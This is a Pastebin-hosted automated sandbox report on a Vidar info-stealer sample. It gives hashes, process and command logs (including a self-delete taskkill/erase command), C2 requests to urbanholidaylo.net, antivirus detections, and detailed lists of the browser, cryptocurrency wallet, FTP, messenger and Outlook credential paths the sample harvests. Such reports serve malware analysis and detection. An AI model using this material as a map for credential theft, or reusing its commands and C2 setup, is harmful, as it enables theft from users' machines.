paladin316

Exes_9599755fd02eca75ad8cc0033c9706f5_exe_2019-08-08_11_30.txt

Aug 8th, 2019
2,388
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 40.27 KB | None | 0 0
  1.  
  2. * MalFamily: "Vidar"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_9599755fd02eca75ad8cc0033c9706f5.exe"
  7. * File Size: 688640
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "4b14aa20e5f1cee63929d4db5b876e9f7d750fda70e0af68b9e249ef5dbb8f8a"
  10. * MD5: "9599755fd02eca75ad8cc0033c9706f5"
  11. * SHA1: "15f43fd1056e0237c5a64ea2392cd8b89fb91aca"
  12. * SHA512: "9a94e236711f6b48360f2e63f954c44e138517342eb9c4c409a9d388306f7b81916174fcabe75082668a0fd1d08e3145fc2f77ae3f529fbb6b2354e9a12de8a9"
  13. * CRC32: "8A0ECD38"
  14. * SSDEEP: "12288:gRyB6xaf/lbMqRcMqDJ1yCP5bFeRJO2UHOcZcXZlz+7yCQAMMMMMMMb:gRy8afRcM2J1yq5bsKOcZUz+XMMMMMM4"
  15.  
  16. * Process Execution:
  17. "Exes_9599755fd02eca75ad8cc0033c9706f5.exe",
  18. "cmd.exe",
  19. "taskkill.exe",
  20. "services.exe",
  21. "svchost.exe",
  22. "WmiPrvSE.exe",
  23. "sdclt.exe",
  24. "taskhost.exe",
  25. "sc.exe",
  26. "svchost.exe",
  27. "WerFault.exe",
  28. "wermgr.exe",
  29. "svchost.exe",
  30. "taskhost.exe",
  31. "WMIADAP.exe"
  32.  
  33.  
  34. * Executed Commands:
  35. "C:\\Windows\\System32\\cmd.exe /c taskkill /im Exes_9599755fd02eca75ad8cc0033c9706f5.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Exes_9599755fd02eca75ad8cc0033c9706f5.exe & exit",
  36. "C:\\Windows\\system32\\lsass.exe",
  37. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  38. "C:\\Windows\\System32\\sdclt.exe /CONFIGNOTIFICATION",
  39. "taskhost.exe $(Arg0)",
  40. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  41. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  42. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  43. "taskkill /im Exes_9599755fd02eca75ad8cc0033c9706f5.exe /f",
  44. "C:\\Windows\\system32\\WerFault.exe -u -p 2592 -s 288",
  45. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_b19f4f5bbeb7afe56774ad38b4a248c71dfb_cab_05418602\""
  46.  
  47.  
  48. * Signatures Detected:
  49.  
  50. "Description": "At least one process apparently crashed during execution",
  51. "Details":
  52.  
  53.  
  54. "Description": "Creates RWX memory",
  55. "Details":
  56.  
  57.  
  58. "Description": "A process attempted to delay the analysis task.",
  59. "Details":
  60.  
  61. "Process": "WmiPrvSE.exe tried to sleep 660 seconds, actually delayed analysis time by 0 seconds"
  62.  
  63.  
  64.  
  65.  
  66. "Description": "A process created a hidden window",
  67. "Details":
  68.  
  69. "Process": "Exes_9599755fd02eca75ad8cc0033c9706f5.exe -> C:\\Windows\\System32\\cmd.exe"
  70.  
  71.  
  72.  
  73.  
  74. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  75. "Details":
  76.  
  77. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  78.  
  79.  
  80. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  81.  
  82.  
  83. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  84.  
  85.  
  86. "suspicious_request": "http://urbanholidaylo.net/482"
  87.  
  88.  
  89. "suspicious_request": "http://urbanholidaylo.net/freebl3.dll"
  90.  
  91.  
  92. "suspicious_request": "http://urbanholidaylo.net/mozglue.dll"
  93.  
  94.  
  95. "suspicious_request": "http://urbanholidaylo.net/msvcp140.dll"
  96.  
  97.  
  98. "suspicious_request": "http://urbanholidaylo.net/nss3.dll"
  99.  
  100.  
  101. "suspicious_request": "http://urbanholidaylo.net/softokn3.dll"
  102.  
  103.  
  104. "suspicious_request": "http://urbanholidaylo.net/vcruntime140.dll"
  105.  
  106.  
  107. "suspicious_request": "http://ip-api.com/line/"
  108.  
  109.  
  110. "suspicious_request": "http://urbanholidaylo.net/"
  111.  
  112.  
  113.  
  114.  
  115. "Description": "Performs some HTTP requests",
  116. "Details":
  117.  
  118. "url": "http://urbanholidaylo.net/482"
  119.  
  120.  
  121. "url": "http://urbanholidaylo.net/freebl3.dll"
  122.  
  123.  
  124. "url": "http://urbanholidaylo.net/mozglue.dll"
  125.  
  126.  
  127. "url": "http://urbanholidaylo.net/msvcp140.dll"
  128.  
  129.  
  130. "url": "http://urbanholidaylo.net/nss3.dll"
  131.  
  132.  
  133. "url": "http://urbanholidaylo.net/softokn3.dll"
  134.  
  135.  
  136. "url": "http://urbanholidaylo.net/vcruntime140.dll"
  137.  
  138.  
  139. "url": "http://ip-api.com/line/"
  140.  
  141.  
  142. "url": "http://urbanholidaylo.net/"
  143.  
  144.  
  145.  
  146.  
  147. "Description": "Deletes its original binary from disk",
  148. "Details":
  149.  
  150.  
  151. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  152. "Details":
  153.  
  154. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 7949238 times"
  155.  
  156.  
  157. "Spam": "Exes_9599755fd02eca75ad8cc0033c9706f5.exe (2100) called API NtQuerySystemInformation 6058900 times"
  158.  
  159.  
  160.  
  161.  
  162. "Description": "Steals private information from local Internet browsers",
  163. "Details":
  164.  
  165. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  166.  
  167.  
  168. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies\\IE_Cookies.txt"
  169.  
  170.  
  171. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  172.  
  173.  
  174. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  175.  
  176.  
  177. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies\\Edge_Cookies.txt"
  178.  
  179.  
  180. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  181.  
  182.  
  183. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies\\Google Chrome_Default.txt"
  184.  
  185.  
  186.  
  187.  
  188. "Description": "Collects information about installed applications",
  189. "Details":
  190.  
  191. "Program": "Google Update Helper"
  192.  
  193.  
  194. "Program": "Microsoft Excel MUI 2013"
  195.  
  196.  
  197. "Program": "Microsoft Outlook MUI 2013"
  198.  
  199.  
  200.  
  201.  
  202. "Program": "Google Chrome"
  203.  
  204.  
  205. "Program": "Adobe Flash Player 29 NPAPI"
  206.  
  207.  
  208. "Program": "Adobe Flash Player 29 ActiveX"
  209.  
  210.  
  211. "Program": "Microsoft DCF MUI 2013"
  212.  
  213.  
  214. "Program": "Microsoft Access MUI 2013"
  215.  
  216.  
  217. "Program": "Microsoft Office Proofing Tools 2013 - English"
  218.  
  219.  
  220. "Program": "Adobe Acrobat Reader DC"
  221.  
  222.  
  223. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  224.  
  225.  
  226. "Program": "Microsoft Publisher MUI 2013"
  227.  
  228.  
  229. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  230.  
  231.  
  232. "Program": "Microsoft Office Shared MUI 2013"
  233.  
  234.  
  235. "Program": "Microsoft Office OSM MUI 2013"
  236.  
  237.  
  238. "Program": "Microsoft InfoPath MUI 2013"
  239.  
  240.  
  241. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  242.  
  243.  
  244. "Program": "Microsoft Word MUI 2013"
  245.  
  246.  
  247. "Program": "Microsoft Groove MUI 2013"
  248.  
  249.  
  250.  
  251.  
  252. "Program": "Microsoft Access Setup Metadata MUI 2013"
  253.  
  254.  
  255. "Program": "Microsoft Office OSM UX MUI 2013"
  256.  
  257.  
  258. "Program": "Java Auto Updater"
  259.  
  260.  
  261. "Program": "Microsoft PowerPoint MUI 2013"
  262.  
  263.  
  264. "Program": "Microsoft Office Professional Plus 2013"
  265.  
  266.  
  267. "Program": "Adobe Refresh Manager"
  268.  
  269.  
  270. "Program": "Microsoft Office Proofing 2013"
  271.  
  272.  
  273. "Program": "Microsoft Lync MUI 2013"
  274.  
  275.  
  276.  
  277.  
  278. "Program": "Microsoft OneNote MUI 2013"
  279.  
  280.  
  281.  
  282.  
  283. "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
  284. "Details":
  285.  
  286. "McAfee": "Artemis!9599755FD02E"
  287.  
  288.  
  289. "Malwarebytes": "Trojan.MalPack.GS"
  290.  
  291.  
  292. "AegisLab": "Trojan.Multi.Generic.4!c"
  293.  
  294.  
  295. "Cybereason": "malicious.1056e0"
  296.  
  297.  
  298. "Symantec": "ML.Attribute.HighConfidence"
  299.  
  300.  
  301. "APEX": "Malicious"
  302.  
  303.  
  304. "Endgame": "malicious (high confidence)"
  305.  
  306.  
  307. "Invincea": "heuristic"
  308.  
  309.  
  310. "McAfee-GW-Edition": "Artemis!Trojan"
  311.  
  312.  
  313. "Trapmine": "malicious.high.ml.score"
  314.  
  315.  
  316. "FireEye": "Generic.mg.9599755fd02eca75"
  317.  
  318.  
  319. "SentinelOne": "DFI - Malicious PE"
  320.  
  321.  
  322. "Webroot": "Trojan.Dropper.Gen"
  323.  
  324.  
  325. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  326.  
  327.  
  328. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  329.  
  330.  
  331. "ESET-NOD32": "a variant of Win32/GenKryptik.DPOC"
  332.  
  333.  
  334. "CrowdStrike": "win/malicious_confidence_80% (W)"
  335.  
  336.  
  337. "Qihoo-360": "HEUR/QVM10.1.0F07.Malware.Gen"
  338.  
  339.  
  340.  
  341.  
  342. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  343. "Details":
  344.  
  345.  
  346. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  347. "Details":
  348.  
  349.  
  350. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  351. "Details":
  352.  
  353. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  354.  
  355.  
  356. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  357.  
  358.  
  359. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b"
  360.  
  361.  
  362. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Bitcoin\\*.*"
  363.  
  364.  
  365. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Electrum\\\n"
  366.  
  367.  
  368. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  369.  
  370.  
  371. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
  372.  
  373.  
  374. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Electrum\\*.*"
  375.  
  376.  
  377. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  378.  
  379.  
  380. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Litecoin\\*.*"
  381.  
  382.  
  383. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Litecoin\\"
  384.  
  385.  
  386. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  387.  
  388.  
  389. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\NameCoin\\*.*"
  390.  
  391.  
  392. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\NameCoin\\"
  393.  
  394.  
  395. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  396.  
  397.  
  398. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  399.  
  400.  
  401. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  402.  
  403.  
  404. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\TerraCoin\\"
  405.  
  406.  
  407. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\TerraCoin\\*.*"
  408.  
  409.  
  410. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  411.  
  412.  
  413. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\PrimeCoin\\*.*"
  414.  
  415.  
  416. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  417.  
  418.  
  419. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  420.  
  421.  
  422. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\PrimeCoin\\"
  423.  
  424.  
  425. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  426.  
  427.  
  428. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\FreiCoin\\*.*"
  429.  
  430.  
  431. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  432.  
  433.  
  434. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\FreiCoin\\"
  435.  
  436.  
  437. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DevCoin\\"
  438.  
  439.  
  440. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  441.  
  442.  
  443. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  444.  
  445.  
  446. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DevCoin\\*.*"
  447.  
  448.  
  449. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  450.  
  451.  
  452. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Franko\\*.*"
  453.  
  454.  
  455. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Franko\\"
  456.  
  457.  
  458. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  459.  
  460.  
  461. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  462.  
  463.  
  464. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MegaCoin\\"
  465.  
  466.  
  467. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MegaCoin\\*.*"
  468.  
  469.  
  470. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  471.  
  472.  
  473. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  474.  
  475.  
  476. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  477.  
  478.  
  479. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\InfiniteCoin\\"
  480.  
  481.  
  482. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\InfiniteCoin\\*.*"
  483.  
  484.  
  485. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\IxCoin\\"
  486.  
  487.  
  488. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  489.  
  490.  
  491. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\IxCoin\\*.*"
  492.  
  493.  
  494. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  495.  
  496.  
  497. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Anoncoin\\*.*"
  498.  
  499.  
  500. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  501.  
  502.  
  503. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  504.  
  505.  
  506. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Anoncoin\\"
  507.  
  508.  
  509. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  510.  
  511.  
  512. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\BBQCoin\\"
  513.  
  514.  
  515. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\BBQCoin\\*.*"
  516.  
  517.  
  518. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  519.  
  520.  
  521. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  522.  
  523.  
  524. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DigitalCoin\\"
  525.  
  526.  
  527. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DigitalCoin\\*.*"
  528.  
  529.  
  530. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  531.  
  532.  
  533. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  534.  
  535.  
  536. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MinCoin\\"
  537.  
  538.  
  539. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MinCoin\\*.*"
  540.  
  541.  
  542. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  543.  
  544.  
  545. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  546.  
  547.  
  548. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
  549.  
  550.  
  551. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  552.  
  553.  
  554. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  555.  
  556.  
  557. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\YACoin\\"
  558.  
  559.  
  560. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\YACoin\\*.*"
  561.  
  562.  
  563. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  564.  
  565.  
  566. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\FlorinCoin\\*.*"
  567.  
  568.  
  569. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  570.  
  571.  
  572. "file": "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\FlorinCoin\\"
  573.  
  574.  
  575.  
  576.  
  577. "Description": "Harvests credentials from local FTP client softwares",
  578. "Details":
  579.  
  580. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  581.  
  582.  
  583.  
  584.  
  585. "Description": "Harvests information related to installed instant messenger clients",
  586. "Details":
  587.  
  588. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  589.  
  590.  
  591.  
  592.  
  593. "Description": "Harvests information related to installed mail clients",
  594. "Details":
  595.  
  596. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  597.  
  598.  
  599. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  600.  
  601.  
  602. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  603.  
  604.  
  605. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  606.  
  607.  
  608. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  609.  
  610.  
  611. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  612.  
  613.  
  614. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  615.  
  616.  
  617.  
  618.  
  619. "Description": "Collects information to fingerprint the system",
  620. "Details":
  621.  
  622.  
  623. "Description": "Created network traffic indicative of malicious activity",
  624. "Details":
  625.  
  626. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  627.  
  628.  
  629.  
  630.  
  631.  
  632. * Started Service:
  633. "VaultSvc",
  634. "WerSvc",
  635. "W32Time"
  636.  
  637.  
  638. * Mutexes:
  639. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  640. "Local\\WERReportingForProcess2592",
  641. "Global\\\\xe5\\x88\\x90\\xc2\\x84",
  642. "Global\\\\xe1\\x9a\\x90\\xc7\\x8b",
  643. "WERUI_BEX64-b19f4f5bbeb7afe56774ad38b4a248c71dfb",
  644. "Global\\ADAP_WMI_ENTRY"
  645.  
  646.  
  647. * Modified Files:
  648. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\passwords.txt",
  649. "C:\\ProgramData\\freebl3.dll",
  650. "C:\\ProgramData\\mozglue.dll",
  651. "C:\\ProgramData\\msvcp140.dll",
  652. "C:\\ProgramData\\nss3.dll",
  653. "C:\\ProgramData\\softokn3.dll",
  654. "C:\\ProgramData\\vcruntime140.dll",
  655. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\ld",
  656. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\historych",
  657. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\History\\Google Chrome_Default.txt",
  658. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Downloads\\Google Chrome_Default.txt",
  659. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\c",
  660. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies\\Google Chrome_Default.txt",
  661. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\wd",
  662. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Autofill\\Google Chrome_Default.txt",
  663. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\CC\\Google Chrome_Default.txt",
  664. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Soft\\Authy\\ D\\xeb\\x87\\x88\\xc8\\xa2\\xe9\\x84\\x88\\xc8\\xb3\\xc3\\x84\\xc7\\xbb\\x10",
  665. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies\\IE_Cookies.txt",
  666. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies\\Edge_Cookies.txt",
  667. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\cookie_list.txt",
  668. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\outlook.txt",
  669. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\information.txt",
  670. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Files\\g1.zip",
  671. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Files\\g2.zip",
  672. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Files\\g3.zip",
  673. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b",
  674. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Ethereum\\",
  675. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Electrum\\\n",
  676. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\ElectrumLTC\\\r",
  677. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Exodus\\\n",
  678. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Exodus\\",
  679. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\ElectronCash\\\r",
  680. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MultiDoge\\\n",
  681. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Zcash\\",
  682. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DashCore\\",
  683. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Litecoin\\",
  684. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Anoncoin\\",
  685. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\BBQCoin\\",
  686. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DevCoin\\",
  687. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DigitalCoin\\",
  688. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\FlorinCoin\\",
  689. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Franko\\",
  690. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\FreiCoin\\",
  691. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\GoldCoinGLD\\\n",
  692. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\InfiniteCoin\\",
  693. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\IOCoin\\",
  694. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\IxCoin\\",
  695. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MegaCoin\\",
  696. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MinCoin\\",
  697. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\NameCoin\\",
  698. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\PrimeCoin\\",
  699. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\TerraCoin\\",
  700. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\YACoin\\",
  701. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\JAXX\\\r",
  702. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\screenshot.jpg",
  703. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\US_00000000-0000-0000-0000-0000000000001629257814.zip",
  704. "C:\\Windows\\sysnative\\LogFiles\\Scm\\2ce1541b-c7b1-4ba0-8974-722d18a3c54d",
  705. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  706. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  707. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
